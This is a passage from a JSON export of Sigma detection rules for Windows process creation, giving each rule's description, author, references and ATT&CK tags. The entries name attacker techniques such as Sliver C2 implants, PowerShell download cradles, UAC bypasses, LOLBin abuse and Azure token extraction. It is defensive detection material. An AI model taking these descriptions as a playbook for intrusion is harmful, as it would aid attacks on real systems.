"9ef27c24-4903-4192-881a-3adde7ff92a5", "value": "Renamed Remote Utilities RAT (RURAT) Execution" }, { "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_whoami_as_param.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "value": "WhoAmI as Parameter" }, { "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-23", "falsepositive": [ "Domain Controller User Logon", "Unknown how many legitimate software products use that method" ], "filename": "proc_creation_win_explorer_nouaccheck.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ORCA6665/status/1496478087244095491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", "value": "Explorer NOUACCHECK Flag" }, { "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42333b2c-b425-441c-b70e-99404a17170f", "value": "HackTool - Sliver C2 Implant Activity Pattern" }, { "description": "Detects using SettingSyncHost.exe to run hijacked binary", "meta": { "author": "Anton Kutepov, oscd.community", "creation_date": "2020-02-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_settingsynchost.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1574.008" ] }, "related": [ { "dest-uuid": "58af3705-8740-4c68-9329-ec015a7013c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "value": "Using SettingSyncHost.exe as LOLBin" }, { "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Legitimate scripts that use IEX" ], "filename": "proc_creation_win_powershell_iex_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09576804-7a05-458e-a817-eb718ca91f54", "value": "Suspicious PowerShell IEX Execution Patterns" }, { "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", "meta": { "author": "Vadim Khrykov, Cyb3rEng", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml" ], "tags": [ "attack.t1204.002", "attack.t1047", "attack.t1218.010", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "value": "Suspicious WMIC Execution Via Office Process" }, { "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2018-04-06", "falsepositive": [ "Administrative scripts", "Microsoft SCCM" ], "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.005", "attack.t1059.001", "attack.t1218" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "value": "Windows Shell/Scripting Processes Spawning Suspicious Programs" }, { "description": "Detects possible execution via LNK file accessed on a WebDAV server.", "meta": { "author": "Micah Babinski", "creation_date": "2023-08-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webdav_lnk_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1204" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1412aa78-a24c-4abd-83df-767dfb2c5bbe", "value": "Potentially Suspicious WebDAV LNK Execution" }, { "description": "Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.\nAdversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Msxsl is not installed by default and is deprecated, so unlikely on most systems." ], "filename": "proc_creation_win_msxsl_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "value": "Msxsl.EXE Execution" }, { "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", "value": "Wab Execution From Non Default Location" }, { "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-25", "falsepositive": [ "Legitimate software creating script event consumers" ], "filename": "proc_creation_win_wmic_eventconsumer_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", "value": "New ActiveScriptEventConsumer Created Via Wmic.EXE" }, { "description": "Detects potential commandline obfuscation using known escape characters", "meta": { "author": "juju4", "creation_date": "2018-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques", "https://twitter.com/vysecurity/status/885545634958385153", "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/Hexacorn/status/885570278637678592", "https://twitter.com/Hexacorn/status/885553465417756673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "value": "Potential Commandline Obfuscation Using Escape Characters" }, { "description": "Detects execution of the IEExec utility to download and execute files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ieexec_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ieexec_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "value": "File Download And Execution Via IEExec.EXE" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_1.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1" }, { "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdclt_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", "value": "Sdclt Child Processes" }, { "description": "Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.echotrail.io/insights/search/wusa.exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "value": "Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths" }, { "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.", "meta": { "author": "CD_ROM_", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_parent_explorer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", "value": "Rundll32 Spawned Via Explorer.EXE" }, { "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", "meta": { "author": "frack113", "creation_date": "2021-11-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_bitlocker.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", "value": "Suspicious Reg Add BitLocker" }, { "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "meta": { "author": "frack113", "creation_date": "2021-11-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_zipexec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Tylous/ZipExec", "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "value": "Suspicious ZipExec Execution" }, { "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", "meta": { "author": "Bartlomiej Czyz, Relativity", "creation_date": "2021-01-31", "falsepositive": [ "False positives may occur if a user called rundll32 from CLI with no options" ], "filename": "proc_creation_win_rundll32_without_parameters.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bczyz1.github.io/2021/01/30/psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1570", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5bb68627-3198-40ca-b458-49f973db8752", "value": "Rundll32 Execution Without Parameters" }, { "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a383dec4-deec-4e6e-913b-ed9249670848", "value": "Potential Signing Bypass Via Windows Developer Features" }, { "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-01-18", "falsepositive": [ "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "filename": "proc_creation_win_java_manageengine_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py", "https://blog.viettelcybersecurity.com/saml-show-stopper/", "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f", "value": "Suspicious Child Process Of Manage Engine ServiceDesk" }, { "description": "Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Administrative activity that must be investigated" ], "filename": "proc_creation_win_susp_add_user_privileged_group.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10fb649c-3600-4d37-b1e6-56ea90bb7e09", "value": "User Added To Highly Privileged Group" }, { "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_localpotato.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/decoder-it/LocalPotato", "https://www.localpotato.com/localpotato_html/LocalPotato.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "cve.2023-21746" ] }, "uuid": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "value": "HackTool - LocalPotato Execution" }, { "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "meta": { "author": "frack113 , X__Junior (Nextron Systems)", "creation_date": "2021-12-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_del_greedy_deletion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "204b17ae-4007-471b-917b-b917b315c5db", "value": "Greedy File Deletion Using Del" }, { "description": "Detects the execution of a specific OneLiner to download and execute powershell modules in memory.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-05-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_cradle_obfuscated.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "44e24481-6202-4c62-9127-5a0ae8e3fe3d", "value": "Obfuscated PowerShell OneLiner Execution" }, { "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-24", "falsepositive": [ "Other tools that work with encoded scripts in the command line instead of script files" ], "filename": "proc_creation_win_powershell_base64_encoded_cmd_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "value": "Suspicious PowerShell Encoded Command Patterns" }, { "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "value": "UAC Bypass Using NTFS Reparse Point - Process" }, { "description": "Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.\n", "meta": { "author": "@Kostastsale", "creation_date": "2022-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml" ], "tags": [ "attack.discovery", "attack.t1135" ] }, "related": [ { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "value": "File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell" }, { "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_browsercore.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mariuszbit/status/1531631015139102720", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" ], "tags": [ "attack.t1528", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "value": "Renamed BrowserCore.EXE Execution" }, { "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", 